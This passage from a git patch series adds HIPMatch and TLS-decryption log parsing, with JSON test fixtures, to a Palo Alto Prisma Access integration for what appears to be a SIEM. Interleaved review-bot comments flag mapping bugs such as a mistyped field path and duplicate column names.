Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + } + } +} \ No newline at end of file From e314c268cf04780877f6b195703ac7f420bfa0b2 Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:48:59 +0100 Subject: [PATCH 273/317] fix(PaloAlto): extract host id and rule name for HIPMatch
---
 Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml | 4 ++--
 .../paloalto-prisma-access/tests/globalprotect_csv.json | 1 +
 .../paloalto-prisma-access/tests/globalprotect_csv_2.json | 1 +
 .../paloalto-prisma-access/tests/test_globalprotect.json | 1 +
 .../paloalto-prisma-access/tests/test_hipmatch_json.json | 4 ++++
 .../paloalto-prisma-access/tests/test_new_globalprotect.json | 1 +
 6 files changed, 10 insertions(+), 2 deletions(-)
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 84514974e..07492992b 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -577,7 +577,7 @@ stages:
 event.module: "{{parsed_description.message.module}}"
 host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}"
 host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}"
- host.id: "{{parsed_event.message.deviceExternalId}}"
+ host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}"
 host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}"
 host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}"
 host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}"
@@ -602,7 +602,7 @@ stages:
 observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}"
 observer.serial_number: "{{parsed_event.message.DeviceSN}}"
 observer.name: "{{parsed_event.message.DeviceName}}"
- rule.name: "{{parsed_event.message.Rule}}"
+ rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}"
 rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}"
 source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}"
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
index 65f2b6940..127226ee3 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
@@ -21,6 +21,7 @@
 "type": "0"
 },
 "host": {
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee",
 "name": "AAAABBBBB",
 "os": {
 "version": "Microsoft Windows 10 Pro , 64-bit"
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
index e0cb016eb..e51f19fbb 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
@@ -21,6 +21,7 @@
 "type": "0"
 },
 "host": {
+ "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3",
 "name": "2021-02707",
 "os": {
 "version": "Microsoft Windows 10 Enterprise , 64-bit"
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
index 5cc8690a2..70c31c202 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
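Review bot: `rule.name` now also receives `HipMatchName`, which names the HIP object/profile that matched rather than a security policy rule, so HIP match events populate the same field that traffic and threat events use for the enforcing policy rule, and a detection that pivots on `rule.name` cannot tell the two apart. If the overload is intended, a comment above the line would make that explicit: `# HIP match events carry the matched HIP object name in rule.name`. Otherwise a vendor field such as `paloalto.hip.name` (constructed name, declared in fields.yml like the existing `paloalto.endpoint.serial_number`) keeps the semantics separate.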
@@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json index 45f8d34f8..fd4e5a75f 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json @@ -24,6 +24,7 @@ "type": "hipmatch" }, "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", "name": "DESKTOP-01" }, "log": { @@ -56,6 +57,9 @@ "jdoe@example.org" ] }, + "rule": { + "name": "VPN Compliant" + }, "source": { "address": "1.2.3.4", "ip": "1.2.3.4", diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { From fd17ed126f555368791cad8216454c1bb8fd7d33 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:51:21 +0100 Subject: [PATCH 274/317] fix(PaloAlto): add support for HipMatch dsv events --- .../paloalto-prisma-access/ingest/parser.yml | 43 +++++++++++ .../tests/test_hipmatch_csv.json | 73 +++++++++++++++++++ 2 files changed, 116 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 07492992b..63f72e8e0 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml 
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -382,6 +382,49 @@ pipeline:
 - HighResolutionTimestamp
 delimiter: ","
+ # HIPMATCH CSV
+ - name: parsed_event
+ filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}"
+ external:
+ name: dsv.parse-dsv
+ properties:
+ input_field: original.message
+ output_field: message
+ columnnames:
+ - PaloAltoDomain
+ - ReceiveTime
+ - DeviceSN
+ - Type
+ - Subtype
+ - ConfigVersion
+ - GenerateTime
+ - SourceUser
+ - VirtualLocation
+ - MachineName
+ - EndpointOSType
+ - SourceAddress
+ - HipMatchName
+ - RepeatCount
+ - HIPMatchType
+ - FUTURE_USE
+ - FUTURE_USE
+ - SequenceNumber
+ - ActionFlags
+ - DGHierarchyLevel1
+ - DGHierarchyLevel2
+ - DGHierarchyLevel3
+ - DGHierarchyLevel4
+ - VirtualSystemName
+ - DeviceName
+ - VirtualSystemID
+ - SourceIPv6
+ - HostID
+ - EndpointSerialNumber
+ - SourceDeviceMac
+ - HighResolutionTimestamp
+ - ClusterName
+ delimiter: ","
+
 - name: parsed_timestamp
 external:
 name: date.parse
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json
new file mode 100644
index 000000000..140e7657e
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json
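Review bot: `columnnames` lists `FUTURE_USE` twice; if `dsv.parse-dsv` keys the parsed columns by name, the second occurrence overwrites the first, which is harmless while neither is mapped but makes the column list misleading, and the DECRYPTION list added later in this series repeats the same duplicate. Unique placeholders such as `- FUTURE_USE_1` / `- FUTURE_USE_2` avoid the collision. The 32 names do line up with the 32 comma-separated fields of the fixture row in test_hipmatch_csv.json, so the positional mapping itself looks right.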
@@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "026701003578" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From f35315945b88ff7a1085f7d2e531cac1196f78d8 Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:55:42 +0100 Subject: [PATCH 275/317] fix(PaloAlto): improve support for decryption events --- .../paloalto-prisma-access/_meta/fields.yml | 15 +++ .../paloalto-prisma-access/ingest/parser.yml | 10 ++ .../tests/test_decryption_json.json | 119 ++++++++++++++++++ 3 files changed, 144 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml index 6382be28b..3b3fd8fc6 100644 --- a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml @@ -297,3 +297,18 @@ paloalto.threat.name: description: The name of the threat name: paloalto.threat.name type: keyword + +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 63f72e8e0..8da957210 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml 
@@ -636,6 +636,13 @@ stages:
 network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}"
 network.protocol: "{{parsed_description.message.proto}}"
 network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}"
+ tls.version: "{{parsed_event.message.TLSVersion[3:]}}"
+ tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}"
+ tls.curve: "{{parsed_event.message.EllipticCurve}}"
+ tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}"
+ tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}"
+ tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}"
+ tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}"
 observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}"
 observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}"
 observer.ingress.interface.name: "{{parsed_description.message.intf}}"
@@ -809,6 +816,9 @@ stages:
 paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}"
 paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}"
 paloalto.threat.name: "{{parsed_threat.message.threat_description}}"
+ paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}"
+ paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}"
+ paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}"
 - set:
 source.user.name: "{{parsed_event.message.SourceUser}}"
 user.name: "{{parsed_event.message.SourceUser}}"
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json
new file mode 100644
index 000000000..35fa4abec
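Review bot: `tls.cipher` reads `parsed_event.message.message.TLS_AUTH`, a doubled `.message.` that no other mapping in the hunk uses, so the third component never resolves; both new fixtures bear this out, since neither test_decryption_json.json nor test_decryption_csv.json expects a `tls.cipher` although key exchange, encryption and auth values are present in their inputs. The JSON representation also names these keys differently from the DSV column list (`TLSAuth`, `CertificateSerial`, `CommonName` versus `TLS_AUTH`, `CertificateSerialNumber`, `SubjectCommonName`), which is why the JSON fixture has no `tls.server.x509.serial_number` or `tls.server.x509.subject.common_name`; the `or`-fallback pattern used throughout this parser covers both, e.g. `tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.TLSAuth or parsed_event.message.TLS_AUTH}}"` and likewise `SubjectCommonName or CommonName` and `CertificateSerialNumber or CertificateSerial`. Even when fixed, the assembled value (`TLS_ECDHE_AES_256_GCM_SHA384` for the fixture input) is not an IANA cipher-suite name because the signature algorithm and `WITH` token are absent, so a comment should state that `tls.cipher` is a vendor-assembled label that will not match a standard cipher list. `tls.version` slices `TLSVersion[3:]`, which is right for `TLS1.2`/`TLS1.3` but yields a meaningless fragment for any value without the `TLS` prefix; anchoring on that prefix (or a `filter`) would be safer.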
--- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json 
@@ -0,0 +1,119 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 
2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome 
Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. 
Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example", + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": 
"eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "jdoe", + "name": "example" + } + } +} \ No newline at end of file From c93a4a974e1e4417b0c7e4496cfc9327ed6b3160 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:57:01 +0100 Subject: [PATCH 276/317] fix(PaloAlto): add support for DSV Decryption events --- .../paloalto-prisma-access/ingest/parser.yml | 118 ++++++++++++++++++ .../tests/test_decryption_csv.json | 98 +++++++++++++++ 2 files changed, 216 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 8da957210..d212c5fcc 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml 
@@ -425,6 +425,124 @@ pipeline: - ClusterName delimiter: "," + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - 
DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json new file mode 100644 index 000000000..8a060536e --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json 
